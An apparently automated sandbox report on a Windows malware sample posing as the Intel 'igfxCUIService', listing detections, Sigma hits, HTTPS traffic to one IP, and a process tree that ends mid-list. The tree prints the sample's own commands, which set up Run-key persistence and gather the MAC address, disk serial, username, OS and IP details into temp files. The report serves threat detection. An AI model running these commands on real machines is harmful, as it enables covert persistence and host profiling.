
Windows Analysis Report IGFXCUISERVICE

Overview

General Information

Sample Name: IGFXCUISERVICE (renamed file extension from none to exe)
Analysis ID: 550959
MD5: d90d0f4d6dad402b5d025987030cc87c
SHA1: fad66bdf5c5dc2c050cbc574832c6995dba086a0
SHA256: 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Writes or reads registry keys via WMI
Encrypted powershell cmdline option found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Sigma detected: Direct Autorun Keys Modification
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Sigma detected: Reg Add RUN Key
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • IGFXCUISERVICE.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\IGFXCUISERVICE.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
    • powershell.exe (PID: 3160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • igfxCUIService.exe (PID: 5780 cmdline: "C:\ProgramData\SystemData\igfxCUIService.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
      • powershell.exe (PID: 6936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 740 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • getmac.exe (PID: 6608 cmdline: C:\Windows\system32\getmac.exe MD5: 6AB605BD2223BFB2E55A466BE9816914)
        • WMIC.exe (PID: 984 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • powershell.exe (PID: 6036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5592 cmdline: C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6628 cmdline: wmic OS get Caption, CSDVersion, OSArchitecture, Version / value MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • cmd.exe (PID: 5508 cmdline: C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 7164 cmdline: wmic nicconfig where 'IPEnabled = True' get ipaddress MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • cmd.exe (PID: 4676 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6752 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • igfxCUIService.exe (PID: 5788 cmdline: "C:\ProgramData\SystemData\igfxCUIService.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
    • cmd.exe (PID: 2248 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 1472 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • igfxCUIService.exe (PID: 6380 cmdline: "C:\ProgramData\SystemData\igfxCUIService.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
    • cmd.exe (PID: 6440 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Direct Autorun Keys Modification
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, CommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4676, ProcessCommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, ProcessId: 6752
Sigma detected: Reg Add RUN Key
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\SystemData\igfxCUIService.exe" , ParentImage: C:\ProgramData\SystemData\igfxCUIService.exe, ParentProcessId: 5780, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, ProcessId: 4676
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt', CommandLine|base64offset|contains: fi, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\SystemData\igfxCUIService.exe" , ParentImage: C:\ProgramData\SystemData\igfxCUIService.exe, ParentProcessId: 5780, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt', ProcessId: 6936
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe', CommandLine|base64offset|contains: rr, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IGFXCUISERVICE.exe" , ParentImage: C:\Users\user\Desktop\IGFXCUISERVICE.exe, ParentProcessId: 7144, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe', ProcessId: 3160
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132863908489920372.3160.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: IGFXCUISERVICE.exe | Virustotal: Detection: 51%
Source: IGFXCUISERVICE.exe | Metadefender: Detection: 20%
Source: IGFXCUISERVICE.exe | ReversingLabs: Detection: 41%
Antivirus / Scanner detection for submitted sample
Source: IGFXCUISERVICE.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Avira: detection malicious, Label: TR/Redcap.rjsiq
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Metadefender: Detection: 20%
Source: C:\ProgramData\SystemData\igfxCUIService.exe | ReversingLabs: Detection: 41%
Source: IGFXCUISERVICE.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: IGFXCUISERVICE.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 5_2_002CB17F FindFirstFileExW,
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown | Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown | Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown | Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown | Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown | Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown | Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 
